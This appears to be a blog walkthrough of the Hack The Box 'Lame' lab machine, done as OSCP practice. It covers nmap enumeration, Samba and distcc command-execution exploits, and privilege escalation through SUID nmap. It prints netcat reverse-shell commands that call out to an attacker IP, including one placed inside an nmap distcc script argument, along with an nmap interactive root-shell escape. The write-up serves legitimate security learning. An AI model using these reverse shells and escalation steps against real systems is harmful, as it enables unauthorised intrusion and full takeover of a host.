HTB – Lame

Lame is a straightforward machine that is great practice for preparing for the OSCP. It enforces some solid concepts, offers a rabbit role and allows for other means of exploitation.

In a nutshell Lame, a linux box, is exploited through a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3. By specifying a username containing shell meta characters, attackers can execute arbitrary commands.

The rabbit hole on this box is a vulnerable FTP version, which we’ll explore and explain why it cannot be exploited.

Another method of rooting this box is to exploit a vulnerable service running on port 3632 called distcc. Once we’re able to gain an initial foothold onto the machine, we then need escalate our privileges. Through some basic enumeration we see that nmap runs as root and all thats left is to breakout and get a root shell using some basic nmap commands.

As for the OSCP what did this box teach me:

  1. Enumerate for all ports. Our initial scan did not show port 3632 open.
  2. Leave no stone unturned. We checked FTP, we ran into some trouble on SMB. If we couldn’t figure out a workaround for SMB, we could have used the distcc vulnerability.
  3. How to use nmap to scan/exploit/privilege escalate

So without further adieu:

Walkthrough for Lame

The IP for Lame is 10.10.10.3

First step as always is a nmap scan of the target host:

sudo nmap -sC -sV -Pn -oA nmap/lame 10.10.10.3

After we received our initial results we will run two more thorough scans, one for all ports and one for UD

ALLPORTS:
sudo nmap -p- -oA nmap/lame-allports 10.10.10.3

UDP:
sudo nmap -p- -oA nmap/lame-UDP-allports 10.10.10.3

Our initial nmap scan returns a few open ports:

21/tcp  open  ftp           vsftpd 2.3.4
22/tcp  open  ssh           OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn?
445/tcp open  microsoft-ds?

ftp

My first reaction is to start poking around at port 21 and answer two questions:

  1. Does it allow anonymous authentication
  2. Is the version vulnerable

The FTP server does allow anonymous authentication

But nothing really much going on inside here…the directory is empty.

Next lets check the version:

Searchsploit returns two backdoors for this current version, one with metasploit and one without. Let’s pull this exploit down and see if it works.

To pull exploits down from searchsploit we use this command

searchsploit -m <fileName>
searchsploit -m 49757

Next step is to open the file in a text editor and see how it works

  1. The exploit is using “USER nergal:)” as the username, after some research we could use ANY username as long as we append ‘ 🙂 ‘ to it.
  2. It’s calling out to telnet on port 6200

So lets start up a netcat listener and let her rip!

I run the script

It eventually times out.

After some research, it seems the backdoor was in fact removed:

This module exploits a malicious backdoor that was added to the VSFTPD download archive. 
This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 
and July 1st 2011 according to the most recent information available. This backdoor was 
removed on July 3rd 2011.

-ExploitDB

Now that we know port 21 is not exploitable, we can move on to port 22. Spoiler alert, not vulnerable either.

smb

Back to our nmap results our next step is to check on ports 139 and 445, good old SMB.

I enumerated a little bit futher on ports 139 and 445 to get the version numbers:

My next step was to use searchsploit once again:

The two most interesting ones to me are the ones where I am able execute some commands. The first one is a Metasplolit module but searchsploit still allows me to pull down the exploit script. I’ll pull the script down and see if anything in the code gives me a hint as to how it works.

The exploit seems to work by specifying a username containing shell meta characters.

We can break down this exploit a step further:

The nohup command executes another program specified as its argument and ignores all sighup (hangup) signals.

In Linux ` ` are used to execute and put the output in place.

So it seems to me that I could put in some payload that results in a reverse shell and this username script will execute it.

I head over to pentestmonkey for their cheat sheet on reverse shells and I devided to go with the netcat version.

nc -e /bin/sh 10.0.0.1 1234

We then subsitute our IP and port of our choice.

I put together my payload and attempt to login. My netcat immeditely picks up and boom!

But….

While it seems that the exploit worked and it caught on my nc listner, when I ran the command whoami I noticed that I connected to my own machine. I had to do some research on this and it seems the way smbclient handles login requests jacks up the payload so we have to find another way to login to smb.

I decided to connect to SMB and change usernames utilizing the logon command and voila, we’re connected as root. I am able to retreive both flags from this shell.

distcc

I thought about what the best way to search for exploits on distcc. I used google and searchsploit to which I had instant success. Google made mentioned of an nmap script that can be used to exploit this vulnerable version so I decided to use the vuln scanner thats built into the nmap scripting engine.

We can tell right away that exploit worked because the nmap outputs the uid for the user daemon. I wanted to look more at this script and see if I could decipher what is going on.

Full disclosure, I pulled down the metasploit exploit and couldn’t make out exactly what was going on. I plan to return later on in the future but for now I found another way.

So lets use the locate command and get the distcc script.

And the cat the results to the screen:

How convenient, don’t you love when an exploit script tells you exactly what to do!

I copied and pasted the command above and subsitutued id for a reverse shell simialr to the one we used during the smb exploit.

And it failed.

Why? The script is using the old name and not the new name we downloaded to our machine.

The actual command is

namp -p 3632 10.10.16.2 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc -e /bin/sh 10.10.16.2 1234'"

I sent up a listener on port 1234 and connection was a success!

Now that we have a shell as user daemon. It’s time to start the privesc process.

I tried to get LinEnum on this machine via wget and curl but I kept running into trouble. So I did some poking around and decided to check the SUID permissions. A quick find search shows the output below.

And I notice right off the bat that nmap is running as root.

I decided to head over to GTFO Bins and saw the nmap can actually spawn a root shell.

nmap --interactive
nmap> !sh 

This leads us to root!

All in all this was a fun box and it allowed me to work out a few issues here and there which is a great learning experience. I think I will revisit this box and focus soley on the distcc portion. I believe there are more ways to exploit this service and I would like to understand the metasploit script a bit more.

Oh and before I forget, all these shells being spawn from netcat are not very “interactive” so don’t forget:

python -c 'import pty;pty.spawn("/bin/sh")'

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: